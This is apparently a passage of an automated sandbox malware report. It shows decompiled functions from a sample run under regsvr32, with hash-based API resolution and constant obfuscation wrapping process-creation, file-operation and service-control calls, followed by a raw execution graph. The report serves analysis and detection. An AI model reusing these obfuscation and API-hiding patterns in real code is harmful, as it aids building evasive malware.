                                                                                                                				_push(_a48);
                                                                                                                				_push(0);
                                                                                                                				_push(_a40);
                                                                                                                				_push(0);
                                                                                                                				_push(_a32);
                                                                                                                				_push(0);
                                                                                                                				_push(_a24);
                                                                                                                				_push(_a20);
                                                                                                                				_push(0);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(0);
                                                                                                                				_push(__ecx);
                                                                                                                				E001EC98A(_t45);
                                                                                                                				_v12 = 0x5160ce;
                                                                                                                				_v12 = _v12 ^ 0x33bed16b;
                                                                                                                				_v12 = _v12 + 0xffffe3b5;
                                                                                                                				_v12 = _v12 | 0x3554987c;
                                                                                                                				_v12 = _v12 ^ 0x37f1882e;
                                                                                                                				_v8 = 0x57d154;
                                                                                                                				_v8 = _v8 + 0xffff861a;
                                                                                                                				_v8 = _v8 * 0x3e;
                                                                                                                				_v8 = _v8 >> 8;
                                                                                                                				_v8 = _v8 ^ 0x0012f1da;
                                                                                                                				_v16 = 0x81ccd1;
                                                                                                                				_v16 = _v16 >> 4;
                                                                                                                				_v16 = _v16 >> 5;
                                                                                                                				_v16 = _v16 ^ 0x000c22df;
                                                                                                                				E001E7F78(__ecx, 0xbd3f148a, __ecx, 0x245, __ecx, 0x989b5ecc);
                                                                                                                				_t52 = CreateProcessW(_a40, _a60, 0, 0, _a64, 0, 0, 0, _t56, _a56); // executed
                                                                                                                				return _t52;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,00000044,?), ref: 001E8236
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.473013320.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.473010416.00000000001E0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000009.00000002.473045478.0000000000204000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_1e0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: 7e58e5a2dccc3d8a10dddd634ea05ac90ad53dce594303d851aa7f7164f25884
                                                                                                                • Instruction ID: e76f5cc3b7eb5ba2e10dbb640cdd2b6ca91f059f3de9a5592a86f3c2c0f943e0
                                                                                                                • Opcode Fuzzy Hash: 7e58e5a2dccc3d8a10dddd634ea05ac90ad53dce594303d851aa7f7164f25884
                                                                                                                • Instruction Fuzzy Hash: 7221C372801248FBCF159F96CD09CCFBFB9EB99714F108098FA1562161D3729A65EB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 58%
                                                                                                                			E001E3466(void* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                                                                                                                				unsigned int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				unsigned int _v16;
                                                                                                                				void* _t29;
                                                                                                                				intOrPtr* _t35;
                                                                                                                				void* _t36;
                                                                                                                				void* _t41;
                                                                                                                
                                                                                                                				_t41 = __ecx;
                                                                                                                				E001EC98A(_t29);
                                                                                                                				_v8 = 0x88f6ec;
                                                                                                                				_v8 = _v8 | 0x6177bf25;
                                                                                                                				_v8 = _v8 >> 0xb;
                                                                                                                				_v8 = _v8 + 0x167f;
                                                                                                                				_v8 = _v8 ^ 0x0004f919;
                                                                                                                				_v16 = 0x9ca171;
                                                                                                                				_v16 = _v16 >> 8;
                                                                                                                				_v16 = _v16 ^ 0x0005b7ae;
                                                                                                                				_v12 = 0xf5b080;
                                                                                                                				_v12 = _v12 * 0x58;
                                                                                                                				_v12 = _v12 ^ 0x54793a02;
                                                                                                                				_t35 = E001E7F78(__ecx, 0xffc5979d, __ecx, 0xcc, __ecx, 0x31e1b46b);
                                                                                                                				_t36 =  *_t35(0, _t41, 0, 0, _a12, __ecx, __edx, 0, 0, _a12, _a16, 0, _a24, _a28, _a32); // executed
                                                                                                                				return _t36;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 001E34FE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.473013320.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.473010416.00000000001E0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000009.00000002.473045478.0000000000204000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_1e0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FolderPath
                                                                                                                • String ID:
                                                                                                                • API String ID: 1514166925-0
                                                                                                                • Opcode ID: b1b65bccfc9919860329f926e3a24493a6d1cd56ea2b7ea92be5dd5deacbab9f
                                                                                                                • Instruction ID: f2625d66b4f5836c352598ca7a3fe0f3b40b1de4f6a6296bb8e3fc1f15c1535c
                                                                                                                • Opcode Fuzzy Hash: b1b65bccfc9919860329f926e3a24493a6d1cd56ea2b7ea92be5dd5deacbab9f
                                                                                                                • Instruction Fuzzy Hash: 66113672801248BBDB11DFA6DD0AC9FBFB8EB95704F108098F914A2210D3714B24DB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 58%
                                                                                                                			E001FEAB3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                				signed int _v8;
                                                                                                                				unsigned int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				void* _t35;
                                                                                                                				intOrPtr* _t40;
                                                                                                                				void* _t41;
                                                                                                                
                                                                                                                				E001EC98A(_t35);
                                                                                                                				_v28 = 0xe6c580;
                                                                                                                				_v24 = 0;
                                                                                                                				_v20 = 0;
                                                                                                                				_v8 = 0x2d161b;
                                                                                                                				_v8 = _v8 + 0xffffdf88;
                                                                                                                				_v8 = _v8 >> 0xa;
                                                                                                                				_v8 = _v8 | 0xc1e5ff2b;
                                                                                                                				_v8 = _v8 ^ 0xc1e88dee;
                                                                                                                				_v16 = 0xd78d92;
                                                                                                                				_v16 = _v16 ^ 0xcf4c3c1d;
                                                                                                                				_v16 = _v16 ^ 0xcf92c072;
                                                                                                                				_v12 = 0x4f9c9d;
                                                                                                                				_v12 = _v12 >> 4;
                                                                                                                				_v12 = _v12 + 0xffff6ea2;
                                                                                                                				_v12 = _v12 ^ 0x00061ead;
                                                                                                                				_t40 = E001E7F78(__ecx, 0xbd3f148a, __ecx, 0x47, __ecx, 0x6e03cec5);
                                                                                                                				_t41 =  *_t40(_a16, 0, _a12, 0x28, 0x28, __edx, _a4, 0, _a12, _a16, _a20, _a24); // executed
                                                                                                                				return _t41;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • SetFileInformationByHandle.KERNEL32(000B5C15,00000000,?,00000028,?,?,?,?,?,?,?,?,?,?,?,00000023), ref: 001FEB5A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.473013320.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.473010416.00000000001E0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000009.00000002.473045478.0000000000204000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_1e0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileHandleInformation
                                                                                                                • String ID:
                                                                                                                • API String ID: 3935143524-0
                                                                                                                • Opcode ID: 62f4fd11f1bee2b778a12be1f39848d568871edb8fd1f68545c84305743f77cd
                                                                                                                • Instruction ID: c565ddc0e5e9a96162646355b106eb1aa1a2870728e2729c207334e4304db971
                                                                                                                • Opcode Fuzzy Hash: 62f4fd11f1bee2b778a12be1f39848d568871edb8fd1f68545c84305743f77cd
                                                                                                                • Instruction Fuzzy Hash: 80111376C0121DFFCF10DFA5990A9EEBFB4EB54314F108089EA14A6294D3B14B64AFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 88%
                                                                                                                			E001F7DA0(void* __ecx, struct _SHFILEOPSTRUCTW* __edx, intOrPtr _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _t34;
                                                                                                                				int _t44;
                                                                                                                				signed int _t46;
                                                                                                                				signed int _t47;
                                                                                                                				struct _SHFILEOPSTRUCTW* _t54;
                                                                                                                
                                                                                                                				_push(_a4);
                                                                                                                				_t54 = __edx;
                                                                                                                				_push(__edx);
                                                                                                                				E001EC98A(_t34);
                                                                                                                				_v12 = 0xcdb49a;
                                                                                                                				_v12 = _v12 + 0x8f05;
                                                                                                                				_v12 = _v12 + 0xffff9965;
                                                                                                                				_v12 = _v12 ^ 0x00c100f7;
                                                                                                                				_v16 = 0xfe6a9a;
                                                                                                                				_v16 = _v16 + 0xffff1466;
                                                                                                                				_v16 = _v16 ^ 0x00fd95e9;
                                                                                                                				_v8 = 0xca762f;
                                                                                                                				_v8 = _v8 << 0xe;
                                                                                                                				_t46 = 0x7f;
                                                                                                                				_v8 = _v8 / _t46;
                                                                                                                				_t47 = 0x2e;
                                                                                                                				_v8 = _v8 / _t47;
                                                                                                                				_v8 = _v8 ^ 0x00082e4e;
                                                                                                                				E001E7F78(_t47, 0xffc5979d, _t47, 0xab, _t47, 0x3ddf729);
                                                                                                                				_t44 = SHFileOperationW(_t54); // executed
                                                                                                                				return _t44;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                • SHFileOperationW.SHELL32(?), ref: 001F7E36
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.473013320.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.473010416.00000000001E0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000009.00000002.473045478.0000000000204000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_1e0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileOperation
                                                                                                                • String ID:
                                                                                                                • API String ID: 3080627654-0
                                                                                                                • Opcode ID: 2a16452b27a4fc3da9f362e710a0266374990953f3da1891371b7e6ecd306318
                                                                                                                • Instruction ID: bb86ae0d1b39cf27997703b822caa80001e80363d7a3e2591d4405f478c950c8
                                                                                                                • Opcode Fuzzy Hash: 2a16452b27a4fc3da9f362e710a0266374990953f3da1891371b7e6ecd306318
                                                                                                                • Instruction Fuzzy Hash: 1E1179B2D00208FBDB14DFA9D80A8DEBBB5EB45314F208199E418A6241E7B55F149F40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 72%
                                                                                                                			E001E3506(void* __ecx, void* __edx, void* _a4, long _a8, intOrPtr _a12, long _a16, intOrPtr _a20) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _t39;
                                                                                                                				void* _t47;
                                                                                                                				signed int _t49;
                                                                                                                
                                                                                                                				_push(_a20);
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				E001EC98A(_t39);
                                                                                                                				_v16 = 0xf4e2fc;
                                                                                                                				_t49 = 0x3b;
                                                                                                                				_v16 = _v16 / _t49;
                                                                                                                				_v16 = _v16 ^ 0x00083f87;
                                                                                                                				_v12 = 0x549d10;
                                                                                                                				_v12 = _v12 << 0xd;
                                                                                                                				_v12 = _v12 + 0xffff8515;
                                                                                                                				_v12 = _v12 | 0x9f85c2ad;
                                                                                                                				_v12 = _v12 ^ 0x9fa0e66d;
                                                                                                                				_v8 = 0xbeaf63;
                                                                                                                				_v8 = _v8 | 0x7acbe5f7;
                                                                                                                				_v8 = _v8 << 0xf;
                                                                                                                				_v8 = _v8 ^ 0x3b62dfe8;
                                                                                                                				_v8 = _v8 ^ 0xcc9b72fd;
                                                                                                                				E001E7F78(_t49, 0xbd3f148a, _t49, 0x106, _t49, 0xba07f621);
                                                                                                                				_t47 = RtlAllocateHeap(_a4, _a16, _a8); // executed
                                                                                                                				return _t47;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(9FA0E66D,?,00083F87), ref: 001E35AB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.473013320.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.473010416.00000000001E0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000009.00000002.473045478.0000000000204000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_1e0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: f96f459a1562cf0811398c59acc1a6a1e894971d13c8e85bf07d59f40b728169
                                                                                                                • Instruction ID: fb14c780019df670ba93329bc37ef3482a0bf92fcbb035eed4a60a67e12cac11
                                                                                                                • Opcode Fuzzy Hash: f96f459a1562cf0811398c59acc1a6a1e894971d13c8e85bf07d59f40b728169
                                                                                                                • Instruction Fuzzy Hash: BD112871D00208FFCF04DFA5D84689EBFB5EB44704F208088F9146A121D3728B24EF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 85%
                                                                                                                			E001F02D8(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _t45;
                                                                                                                				int _t59;
                                                                                                                				signed int _t61;
                                                                                                                				signed int _t62;
                                                                                                                				signed int _t63;
                                                                                                                				signed int _t64;
                                                                                                                				void* _t75;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_t75 = __ecx;
                                                                                                                				_push(_a4);
                                                                                                                				_push(__ecx);
                                                                                                                				E001EC98A(_t45);
                                                                                                                				_v12 = 0xd4268f;
                                                                                                                				_t61 = 0x55;
                                                                                                                				_v12 = _v12 / _t61;
                                                                                                                				_t62 = 0x39;
                                                                                                                				_v12 = _v12 / _t62;
                                                                                                                				_t63 = 0x19;
                                                                                                                				_v12 = _v12 / _t63;
                                                                                                                				_v12 = _v12 ^ 0x00038c24;
                                                                                                                				_v16 = 0xae7fc4;
                                                                                                                				_v16 = _v16 + 0x7c1;
                                                                                                                				_v16 = _v16 ^ 0x00ac1f44;
                                                                                                                				_v8 = 0x83f9bc;
                                                                                                                				_v8 = _v8 ^ 0x1ab9b921;
                                                                                                                				_v8 = _v8 | 0xa5451e1d;
                                                                                                                				_t64 = 0x5c;
                                                                                                                				_v8 = _v8 / _t64;
                                                                                                                				_v8 = _v8 ^ 0x021ff71d;
                                                                                                                				E001E7F78(_t64, 0xbd3f148a, _t64, 0x72, _t64, 0x529e328);
                                                                                                                				_t59 = CloseHandle(_t75); // executed
                                                                                                                				return _t59;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 001F0384
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.473013320.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.473010416.00000000001E0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000009.00000002.473045478.0000000000204000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_1e0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 2962429428-0
                                                                                                                • Opcode ID: e059c3c066ff345504bba9c85b1d4992eba54445fe3d98b1d9d536134e0d9d68
                                                                                                                • Instruction ID: f1700c63e3929151d68984be9189f61f6eabeb9c2031d6e62353db256bc9be30
                                                                                                                • Opcode Fuzzy Hash: e059c3c066ff345504bba9c85b1d4992eba54445fe3d98b1d9d536134e0d9d68
                                                                                                                • Instruction Fuzzy Hash: B3114F71E01208FFEB08DFA5D80A9EEBBB5EB84314F50C09AE514AB281E7B15F119F40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:17.4%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:1039
                                                                                                                Total number of Limit Nodes:15
272519 3891->4277 3894->3891 3899 2717d2 GetPEB 3895->3899 3896->3891 3897->3897 3900 2746df 3899->3900 3902 2717d2 GetPEB 3900->3902 3901->3891 3903 2746f2 3902->3903 3903->3827 4281 271919 3904->4281 3906 27f5d9 GetPEB RtlAllocateHeap 3907 27857d 3906->3907 3907->3906 3908 26cca2 GetPEB 3907->3908 3909 2785ac 3907->3909 3910 2786e9 3907->3910 3912 278eb3 GetPEB 3907->3912 3913 26d467 GetPEB 3907->3913 3915 27f94b GetPEB 3907->3915 3908->3907 3911 264b40 2 API calls 3909->3911 3910->3910 3914 2785cb 3911->3914 3912->3907 3913->3907 3914->3827 3915->3907 3920 27d360 3916->3920 3917 266e01 2 API calls 3917->3920 3919 27ed7b 2 API calls 3919->3920 3920->3917 3920->3919 3921 268e38 2 API calls 3920->3921 3922 27d3ab 3920->3922 3924 27d3be 3920->3924 4284 28267c 3920->4284 3921->3920 3923 27ed7b 2 API calls 3922->3923 3923->3924 3924->3827 3932 27fee5 3925->3932 3927 27f5d9 GetPEB RtlAllocateHeap 3927->3932 3929 263466 2 API calls 3929->3932 3930 280568 3930->3827 3931 26d467 GetPEB 3931->3932 3932->3927 3932->3929 3932->3930 3932->3931 3933 27f94b GetPEB 3932->3933 4288 274e54 3932->4288 4298 28224c 3932->4298 3933->3932 3935 26303a 2 API calls 3934->3935 3936 271b14 3935->3936 3936->3827 3946 27ef01 3937->3946 3940 2725cd GetPEB 3940->3946 3942 27f5b4 3942->3827 3943 2717d2 GetPEB 3943->3946 3946->3940 3946->3942 3946->3943 4306 271b29 3946->4306 4318 27e168 3946->4318 4329 27519c 3946->4329 4347 27bd63 3946->4347 4364 272b1f 3946->4364 3948 2679e8 3947->3948 3949 267f78 GetPEB 3948->3949 3950 267a5b 3949->3950 3950->3827 3954 278c0a 3951->3954 3952 27f5d9 2 API calls 3952->3954 3953 278cc1 4525 277098 3953->4525 3954->3952 3954->3953 3956 278eb3 GetPEB 3954->3956 3957 278cbf 3954->3957 3959 27f94b GetPEB 3954->3959 4521 262263 3954->4521 3956->3954 3957->3827 3959->3954 3961 280a22 3960->3961 3966 26303a 2 API calls 3961->3966 3967 280ddc 3961->3967 4549 261a5f 3961->4549 4557 26aebb 3961->4557 4580 26d4bc 3961->4580 4600 276e97 3961->4600 4607 279a0c 3961->4607 
4619 26c151 3961->4619 4627 26958a 3961->4627 3966->3961 3967->3827 3974 27952d 3971->3974 3972 26cca2 GetPEB 3972->3974 3973 27960e 3973->3827 3974->3972 3974->3973 3977 27fbc6 3975->3977 3976 27fc88 3976->3827 3977->3976 4740 26d3bf 3977->4740 4744 26c0ba 3977->4744 3982 26ac19 3980->3982 3985 26adad 3982->3985 3988 2717d2 GetPEB 3982->3988 4748 280de9 3982->4748 4752 272657 3982->4752 4756 2622f7 3982->4756 4763 273e11 3982->4763 4766 267c7a 3982->4766 3985->3827 3988->3982 3990 271919 GetPEB 3989->3990 3991 2827a3 3990->3991 4774 27ee14 3991->4774 3996 2821ad 3994->3996 3995 282212 3998 270231 GetPEB 3995->3998 3996->3995 3999 282210 3996->3999 4000 26303a 2 API calls 3996->4000 4778 276d6b 3996->4778 3998->3999 3999->3827 4000->3996 4002 268f94 4001->4002 4003 268f9c 4002->4003 4004 26303a 2 API calls 4002->4004 4006 268fb3 4002->4006 4782 263f5a 4003->4782 4004->4002 4006->3827 4010 27dc82 4007->4010 4009 27f5d9 GetPEB RtlAllocateHeap 4009->4010 4010->4009 4011 270184 GetPEB 4010->4011 4012 26d467 GetPEB 4010->4012 4013 27df19 4010->4013 4015 27f94b GetPEB 4010->4015 4017 263466 2 API calls 4010->4017 4815 263e99 4010->4815 4819 277a67 4010->4819 4823 273cbe 4010->4823 4011->4010 4012->4010 4013->3827 4015->4010 4017->4010 4019 26ae46 4018->4019 4020 267f78 GetPEB 4019->4020 4021 26aeaf 4020->4021 4021->3827 4024 276226 4022->4024 4026 262263 GetPEB 4024->4026 4027 276266 4024->4027 4827 26ca3c 4024->4827 4830 277b9e 4024->4830 4026->4024 4027->3827 4029 2679cc GetPEB 4028->4029 4030 27277c 4029->4030 4030->3827 4034 26e68a 4031->4034 4032 26eb20 4033 264e8f GetPEB 4032->4033 4036 26eb1e 4033->4036 4034->4032 4035 26303a 2 API calls 4034->4035 4034->4036 4037 264e8f GetPEB 4034->4037 4035->4034 4036->3827 4037->4034 4046 27324b 4038->4046 4040 27343d 4042 2717d2 GetPEB 4040->4042 4044 27343b 4042->4044 4043 26303a 2 API calls 4043->4046 4044->3827 4046->4040 4046->4043 4046->4044 4868 27e5ed 4046->4868 4878 278cf2 4046->4878 4882 26bdeb 4046->4882 4057 26d14d 
4047->4057 4048 27f5d9 2 API calls 4048->4057 4050 26d27f 4051 262263 GetPEB 4050->4051 4053 26d297 4051->4053 4052 278eb3 GetPEB 4052->4057 4991 2635b1 4053->4991 4055 27f94b GetPEB 4055->4057 4057->4048 4057->4050 4057->4052 4057->4055 4058 26d27d 4057->4058 4059 27d15e 4 API calls 4057->4059 4060 264b40 2 API calls 4057->4060 4975 281a0a 4057->4975 4982 26c4e5 4057->4982 4058->3820 4059->4057 4060->4057 4062 2791ec 4061->4062 4081 267f78 4062->4081 4066 2702ee 4065->4066 4067 267f78 GetPEB 4066->4067 4068 270380 CloseHandle 4067->4068 4068->3840 4070 27a53c 4069->4070 4071 267f78 GetPEB 4070->4071 4072 27a5d0 CreateFileW 4071->4072 4072->3840 4074 28058d 4073->4074 4111 2797b1 4074->4111 4078 282558 4077->4078 4079 267f78 GetPEB 4078->4079 4080 2825c5 4079->4080 4080->3840 4082 268032 4081->4082 4083 268055 4081->4083 4087 26806b 4082->4087 4083->3840 4085 268040 4090 2766c8 4085->4090 4094 2632ac GetPEB 4087->4094 4089 26812d 4089->4085 4092 2766ed 4090->4092 4091 27680d 4091->4083 4092->4091 4095 26bb14 4092->4095 4094->4089 4096 26bce5 4095->4096 4103 27a5eb 4096->4103 4099 26bd2c 4101 26bd62 4099->4101 4102 2766c8 GetPEB 4099->4102 4101->4091 4102->4101 4104 27a602 4103->4104 4105 267f78 GetPEB 4104->4105 4106 26bd0c 4105->4106 4106->4099 4107 2631ea 4106->4107 4108 263200 4107->4108 4109 267f78 GetPEB 4108->4109 4110 2632a0 4109->4110 4110->4099 4112 2797d5 4111->4112 4113 267f78 GetPEB 4112->4113 4114 279852 4113->4114 4114->3840 4116 26348b 4115->4116 4117 267f78 GetPEB 4116->4117 4118 2634f4 SHGetFolderPathW 4117->4118 4118->3849 4120 266e19 4119->4120 4121 267f78 GetPEB 4120->4121 4122 266ea5 OpenSCManagerW 4121->4122 4122->3849 4124 27ed91 4123->4124 4125 267f78 GetPEB 4124->4125 4126 27ee09 CloseServiceHandle 4125->4126 4126->3849 4139 27345b 4127->4139 4131 263122 4131->3849 4138 2678e4 4132->4138 4134 26799d 4150 2691f2 4134->4150 4135 280575 GetPEB 4135->4138 4137 26799b 4137->3849 4138->4134 4138->4135 4138->4137 4146 270184 4138->4146 4140 267f78 
GetPEB 4139->4140 4141 26310a 4140->4141 4142 263506 4141->4142 4143 263522 4142->4143 4144 267f78 GetPEB 4143->4144 4145 26359f RtlAllocateHeap 4144->4145 4145->4131 4147 27019a 4146->4147 4148 267f78 GetPEB 4147->4148 4149 270225 4148->4149 4149->4138 4151 26920b 4150->4151 4152 267f78 GetPEB 4151->4152 4153 269282 4152->4153 4153->4137 4163 263678 4154->4163 4156 2717d2 GetPEB 4156->4163 4157 26303a GetPEB RtlAllocateHeap 4157->4163 4159 263df0 4159->3865 4162 27ed7b 2 API calls 4162->4163 4163->4156 4163->4157 4163->4159 4163->4162 4181 26cd1c 4163->4181 4185 27640e 4163->4185 4189 268e38 4163->4189 4193 2632b3 4163->4193 4197 26cca2 4163->4197 4166 2798a4 4165->4166 4167 267f78 GetPEB 4166->4167 4168 27992e 4167->4168 4168->3865 4170 27f5f3 4169->4170 4171 26303a 2 API calls 4170->4171 4172 27f6bd 4171->4172 4172->3865 4172->4172 4174 26d492 4173->4174 4200 26adb7 4174->4200 4178 27f960 4177->4178 4203 2717d2 4178->4203 4182 26cd46 4181->4182 4183 267f78 GetPEB 4182->4183 4184 26cdc8 4183->4184 4184->4163 4186 276424 4185->4186 4187 267f78 GetPEB 4186->4187 4188 2764bd 4187->4188 4188->4163 4190 268e54 4189->4190 4191 267f78 GetPEB 4190->4191 4192 268ed4 OpenServiceW 4191->4192 4192->4163 4194 2632ec 4193->4194 4195 267f78 GetPEB 4194->4195 4196 263397 4195->4196 4196->4163 4198 267f78 GetPEB 4197->4198 4199 26cd13 4198->4199 4199->4163 4201 267f78 GetPEB 4200->4201 4202 26ae2c 4201->4202 4202->3865 4204 2717e2 4203->4204 4205 27345b GetPEB 4204->4205 4206 2718fd 4205->4206 4209 266f64 4206->4209 4210 266f81 4209->4210 4211 267f78 GetPEB 4210->4211 4212 267002 4211->4212 4212->3865 4214 27ead4 4213->4214 4215 267f78 GetPEB 4214->4215 4216 27eb4e SetFileInformationByHandle 4215->4216 4216->3877 4218 278ed5 4217->4218 4219 26adb7 GetPEB 4218->4219 4220 278ef0 4219->4220 4220->3877 4222 264b5a 4221->4222 4245 2725cd 4222->4245 4225 2725cd GetPEB 4226 264dff 4225->4226 4227 2725cd GetPEB 4226->4227 4228 264e15 4227->4228 4229 2691f2 GetPEB 4228->4229 4230 264e30 
4229->4230 4231 2691f2 GetPEB 4230->4231 4232 264e4c 4231->4232 4249 277da0 4232->4249 4234 264e81 4234->3884 4236 269003 4235->4236 4237 27f5d9 2 API calls 4236->4237 4238 2691a5 4237->4238 4261 281c9b 4238->4261 4241 27f94b GetPEB 4242 2691d7 4241->4242 4265 267bc6 4242->4265 4244 2691e9 4244->3885 4246 2725e3 4245->4246 4253 26218f 4246->4253 4250 277db3 4249->4250 4251 267f78 GetPEB 4250->4251 4252 277e32 SHFileOperationW 4251->4252 4252->4234 4254 2621a7 4253->4254 4257 267b24 4254->4257 4258 267b3c 4257->4258 4259 267f78 GetPEB 4258->4259 4260 26221a 4259->4260 4260->4225 4262 281cba 4261->4262 4263 26adb7 GetPEB 4262->4263 4264 2691c4 4263->4264 4264->4241 4266 267bd6 4265->4266 4267 267f78 GetPEB 4266->4267 4268 267c6e DeleteFileW 4267->4268 4268->4244 4270 26d2ee 4269->4270 4271 267f78 GetPEB 4270->4271 4272 26d34d 4271->4272 4272->3891 4274 2692b3 4273->4274 4275 267f78 GetPEB 4274->4275 4276 26932f 4275->4276 4276->3891 4278 272532 4277->4278 4279 267f78 GetPEB 4278->4279 4280 27259c 4279->4280 4280->3891 4282 267f78 GetPEB 4281->4282 4283 2719a8 4282->4283 4283->3907 4285 28268c 4284->4285 4286 267f78 GetPEB 4285->4286 4287 2826f0 4286->4287 4287->3920 4289 274e7d 4288->4289 4290 2725cd GetPEB 4289->4290 4291 27504f 4290->4291 4302 26816b 4291->4302 4293 27508e 4294 2702d8 2 API calls 4293->4294 4297 275099 4293->4297 4295 2750b6 4294->4295 4296 2702d8 2 API calls 4295->4296 4296->4297 4297->3932 4299 282274 4298->4299 4300 26adb7 GetPEB 4299->4300 4301 282299 4300->4301 4301->3932 4303 2681a6 4302->4303 4304 267f78 GetPEB 4303->4304 4305 268221 CreateProcessW 4304->4305 4305->4293 4317 271b59 4306->4317 4307 2723a5 4310 2717d2 GetPEB 4307->4310 4308 26303a 2 API calls 4308->4317 4309 2717d2 GetPEB 4309->4317 4313 2723a3 4310->4313 4313->3946 4317->4307 4317->4308 4317->4309 4317->4313 4373 277730 4317->4373 4380 27af0b 4317->4380 4395 276845 4317->4395 4399 27fd42 4317->4399 4403 27490e 4317->4403 4326 27e468 4318->4326 4320 27f5d9 2 API calls 
